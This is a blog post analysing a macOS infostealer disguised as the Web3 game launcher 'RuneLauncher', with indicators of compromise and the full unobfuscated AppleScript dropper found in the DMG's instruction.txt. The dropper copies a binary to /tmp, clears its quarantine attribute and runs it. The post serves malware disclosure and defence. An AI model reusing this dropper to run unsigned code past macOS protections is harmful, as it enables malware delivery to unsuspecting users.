Cover photo

🎉 More AppleScript Malware 🎉 via Web3 Game Rune/Rise Online

Why does it always have to be games or meeting software?

A new account shot me a DM in Twitter with some malware, so I figured "why not?". Of course the standard procedure applies:

  1. Do you want a job as an admin / moderator? Pays $500 a week!

  2. Sends a malicious link.

  3. Part of the requirement is creating an account through the software after you download it.

  4. Aaaaand of course it's just straight up malware that steals everything. EZPZ.

Let's jump into it.


Info

URL

https[://]runeonline[.]games

URLScan.io

https://urlscan.io/result/cf8cb6ac-7428-4a21-b182-292e6fcd4a43/

URL VT

https://www.virustotal.com/gui/url/7872392c2d96ce74deef786437a1118e4f2e1780f7988ea7d38c7a47ff6b6c68

Downloaded File Name

RuneLauncher_v.2.5.dmg

Downloaded File Hash

3f5b9f5940173e9fb46b2eff36c9805dc68652ede49c29a6efafaccc540e2a15

VT (4/62)

https://www.virustotal.com/gui/file/3f5b9f5940173e9fb46b2eff36c9805dc68652ede49c29a6efafaccc540e2a15?nocache=1

DMG File 1

RuneLauncher

File 1 Hash

e44228575afdd57630f1ce960d7843ff1052ecea46b9d66ba6d6fdfd83c45511

File 1 VT (6/64)

https://www.virustotal.com/gui/file/e44228575afdd57630f1ce960d7843ff1052ecea46b9d66ba6d6fdfd83c45511

DMG File 2

instruction.txt

File 2 Hash

71421867fcd32ac92545f4a623543cf077838791691a4323347235493aa41767

File 2 VT (0/61)

https://www.virustotal.com/gui/file/71421867fcd32ac92545f4a623543cf077838791691a4323347235493aa41767

DMG File 3

An alias to the terminal application.


First Look

I mounted the "RuneLauncher_v.2.5.dmg" file using:

hdiutil attach RuneLauncher_v.2.5.dmg

and it contained the three files shown above:

  • instruction.txt (Plain Text)

  • RuneLauncher (Unix Executable)

  • Terminal (Alias)

What's inside instruction.txt? Well, I bet you already guessed it; more AppleScript 🎉! And it's not even obfuscated 🙃.

#!/bin/bash
osascript -e 'on run
    try
        set volumeList to list disks
    end try
    set setupVolume to ""
    try
        repeat with vol in volumeList
            if vol contains "RuneLauncher" then
                set setupVolume to vol
                exit repeat
            end if
        end repeat
    end try
    if setupVolume is "" then
        return
    end if
    set scriptDir to "/Volumes/" & setupVolume & "/"
    set executableName to "RuneLauncher"
    set executablePath to scriptDir & executableName
    set tmpExecutablePath to "/tmp/" & executableName
    try
        do shell script "rm -f " & quoted form of tmpExecutablePath
    end try
    try
        do shell script "cp " & quoted form of executablePath & " " & quoted form of tmpExecutablePath
    end try
    try
        do shell script "xattr -c " & quoted form of tmpExecutablePath
    end try
    try
        do shell script "chmod +x " & quoted form of tmpExecutablePath
    end try
    try
        do shell script quoted form of tmpExecutablePath
    end try
end run'

So instead of the AppleScript being used to perform the actions right off the bat, it's using it to execute RuneLauncher. Neat! What's inside of RuneLauncher? It is (of course) adhoc signed.

Running the following command, I extract it to grab the binaries:

7z x RuneLauncher

Running it again, I extract it to separate the interior files:

7z x RuneLauncher\~.x64

And now I'm left with this:

At this point, it's time to see how messed up the internals of these files are and whether it'd be easier to approach the sample dynamically or statically. For this, I'm now using a tool called "Hex Fiend" instead of Sublime.

Inside it of is little else other than giant blobs of encoded/encrypted data. It looks like everything may be Base32-encoded on the surface, than potentially some specific strings are used to decrypt it, as just Base32 decoding doesn't give any information up. I ((still)) haven't had time to setup my dynamic analysis environment, which also means I don't have time to walk through this with Binary Ninja and pull values (sadly). But this thing, for sure, is malicious, so stay safe out there! Anything with a Terminal alias inside of it and AppleScript inside a .txt file can't be trusted. 😂

I've updated my Web3/Crypto MacOS malware collection on VirusTotal with it, so feel free to check them out if you're interested in more: https://www.virustotal.com/gui/collection/727abc31926dc18e3fb984679954393c10e9383b1a78fea085254d46bd279cc0/iocs

Loading...
highlight
Collect this post to permanently own it.
alp1n3.eth logo
Subscribe to alp1n3.eth and never miss a post.
#malware#macos#web3#crypto